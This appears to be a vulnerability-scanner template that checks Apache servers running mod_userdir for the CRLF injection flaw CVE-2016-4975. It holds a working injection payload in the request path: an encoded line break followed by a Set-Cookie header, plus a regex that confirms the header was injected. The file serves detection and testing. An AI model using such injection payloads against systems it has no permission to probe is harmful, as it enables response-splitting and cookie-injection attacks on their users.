id: CVE-2016-4975

info:
  name: Apache mod_userdir CRLF injection
  author: melbadry9,nadino,xElkomy,sullo
  severity: low
  description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
  tags: crlf,generic,cves,cve2016
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-4975
    cwe-id: CWE-93

requests:
  - method: GET
    path:
      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"

    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
        part: header